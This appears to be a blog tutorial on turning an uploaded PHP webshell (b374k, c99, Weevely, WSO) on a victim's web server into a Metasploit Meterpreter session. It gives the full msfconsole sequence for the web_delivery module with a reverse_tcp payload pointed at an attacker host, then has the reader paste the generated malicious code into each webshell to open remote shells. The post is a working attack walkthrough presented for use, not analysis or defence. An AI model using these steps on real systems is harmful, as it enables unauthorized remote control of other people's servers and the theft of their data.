Webshell to Meterpreter

Through this article you will learn how we can achevie meterpreter shell after uploading a PHP backdoor script in victim’s PC. You can read previous article to upload PHP web shell in a web server.

Type msfconsole and load metasploit framework
Now type use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.0.104 
msf exploit (web_delivery)>set srvport  8081
msf exploit (web_delivery)>exploit


Copy the highlighted text shown in below window 


Meterpreter shell using b374k

Now from given screenshot you can see here we have successfully uploaded b374k script and now paste above copied malicious code and execute it as command.


When above code gets execute you will get meterpreter session 1.
msf exploit (web_delivery)>session –I 1
meterpreter> sysinfo


Meterpreter shell using c99 shell

Repeat the same process; after uploading c99 script in a web server now paste that PHP code which we have got through web delivery inside the c99 shell script and execute as command.


This will give you another meterpreter session.
meterpreter> sysinfo


Meterpreter shell using Weevely

Once you have uploaded weevely backdoor inside web server now repeat the same process inside weevely as I have done and past malicious PHP code which we have got through web delivery and hit enter.


Here one more session will get opened for meterpreter shell.
meterpreter> sysinfo


Meterpreter shell using wso2.5.1.php

Now next step is to get meterpreter shell through wso2.5.1.php script and again repeat the same step for web delivery to get the malicious PHP code and past that code under this script and execute as command.


CONGRATS!!!  we have successfully access meterpreter shell through different php script Here we have again a meterpreter session
meterpreter> sysinfo

0 comments:

Post a Comment